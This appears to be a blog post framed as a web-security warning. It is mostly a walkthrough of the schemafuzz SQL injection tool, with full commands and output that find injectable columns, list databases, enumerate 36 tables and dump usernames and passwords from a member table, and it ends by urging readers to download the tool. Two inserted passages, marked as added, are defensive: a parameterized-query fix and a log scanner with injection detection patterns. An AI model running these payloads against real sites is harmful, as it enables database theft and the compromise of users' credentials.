Hi all. Like my other post about web security, I think I have to share this one with you, because if you do not patch your website's security, it can easily be cracked by someone. Your site may be defaced, or your database may be stolen. And you know what happens then… your site will lose its Google AdSense income and everything you gained from SEO. I'm sure you don't want this to happen.
I'm going to show my experiment using schemafuzz. I had never tried SQL injection with this tool before; I just found it at http://whitesecure.com. I think this is a cool tool from darkc0de that you should try. All we need to use it is a Python interpreter. For Linux users, Python is usually installed by default, so we don't have to install it. But Win***s users, please download it here.
So, let's begin:
root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561 --findcol
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://myownsite.me/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!
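The SQLi URL reported above only works if news.php places the id value directly into the SQL text. As an added example (not code from the original post or from schemafuzz), this sketch reproduces that flaw with an in-memory SQLite database standing in for MySQL and shows the same request value bound as a parameter; the table contents and function names are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string from the "SQLi URL" line above; parse_qs decodes "+" to spaces.
INJECTED_ID = parse_qs("id=1561+AND+1=2+UNION+SELECT+0,1,2,3,4,5--")["id"][0]
COLUMNS = "id, name, description, submit_date, update_date, visit"


def make_db():
    # Constructed stand-in for the six-column news table the tool reports.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, name TEXT, description TEXT, "
               "submit_date TEXT, update_date TEXT, visit INTEGER)")
    db.execute("INSERT INTO news VALUES (1561, 'Sample headline', 'Sample body', "
               "'2010-01-01', '2010-01-02', 7)")
    return db


def news_vulnerable(db, raw_id):
    # The flaw: the request value becomes part of the SQL text, so
    # "AND 1=2 UNION SELECT ..." is parsed as SQL instead of as an id.
    return db.execute(f"SELECT {COLUMNS} FROM news WHERE id = {raw_id}").fetchall()


def news_parameterized(db, raw_id):
    # The fix: the value is bound as data and cannot change the statement.
    return db.execute(f"SELECT {COLUMNS} FROM news WHERE id = ?", (raw_id,)).fetchall()


def news_validated(db, raw_id):
    # Defence in depth: an id is digits only, so reject anything else up front.
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    return news_parameterized(db, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", news_vulnerable(db, INJECTED_ID))
    print("parameterized:", news_parameterized(db, INJECTED_ID))
    print("validated:    ", news_validated(db, "1561"))
```

In the vulnerable version the row that comes back is the one the request supplied, which is exactly what the tool's column test relies on; with a bound parameter the same value matches no article.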
root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 --dbs
[+] URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: css_mycss
User: css_mycss@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2
[0] css_mycss
[1] test
[-] 06:17:50
[-] Total URL Requests 4
[-] Done
Don’t forget to check schemafuzzlog.txt
root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 --schema -D css_mycss
[+] URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: css_mycss
User: css_mycss@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "css_mycss"
[+] Number of Tables: 36
[Database]: css_mycss
[Table: Columns]
[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag
[-] 06:45:44
[-] Total URL Requests 315
[-] Done
Don’t forget to check schemafuzzlog.txt
root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 --dump -D css_mycss -T member -C id,username,password
[+] URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: css_mycss
User: css_mycss@localhost
Version: 5.0.51a-community
[+] Dumping data from database "css_mycss" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71
[-] 06:55:38
[-] Total URL Requests 73
[-] Done
Don’t forget to check schemafuzzlog.txt
That's it…
Quite simple, isn't it? What are you waiting for? Go to http://darkc0de.com to download it, or just click here.
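For the site owner, the runs above leave a recognisable trail in the web server's access log: one client requesting news.php with AND 1=2, UNION SELECT and a trailing -- in the id parameter, hundreds of times over. As an added example (not part of the original post), this sketch flags such requests after URL-decoding; the log lines are constructed and the rule names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2010:06:14:02 +0000] "GET /news.php?id=1561 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jan/2010:06:14:09 +0000] "GET /about.php?ref=credit+union HTTP/1.1" 200 2210
203.0.113.9 - - [10/Jan/2010:06:15:17 +0000] "GET /news.php?id=1561+AND+1=2+UNION+SELECT+0,1,2,3,4,5-- HTTP/1.1" 200 4811
203.0.113.9 - - [10/Jan/2010:06:15:18 +0000] "GET /news.php?id=1561%20and%201=2%20UnIoN%20SeLeCt%200,1,2,3,4,5-- HTTP/1.1" 200 4811
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Patterns are matched against the decoded, lower-cased query string, so
# "+", "%20" and mixed-case spellings of the same request all look alike.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "trailing_comment": re.compile(r"--\s*$"),
    "information_schema": re.compile(r"\binformation_schema\b"),
}


def scan(log_text):
    """Return {client_ip: {rule_name: hit_count}} for suspicious requests."""
    hits = {}
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match or "?" not in match.group(2):
            continue
        client, target = match.groups()
        query = unquote_plus(target.split("?", 1)[1]).lower()
        for name, rule in RULES.items():
            if rule.search(query):
                per_client = hits.setdefault(client, {})
                per_client[name] = per_client.get(name, 0) + 1
    return hits


if __name__ == "__main__":
    for client, rules in scan(SAMPLE_LOG).items():
        print(client, rules)
```

Signature matching like this is a detection aid, not a fix; the query itself still has to be parameterized.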

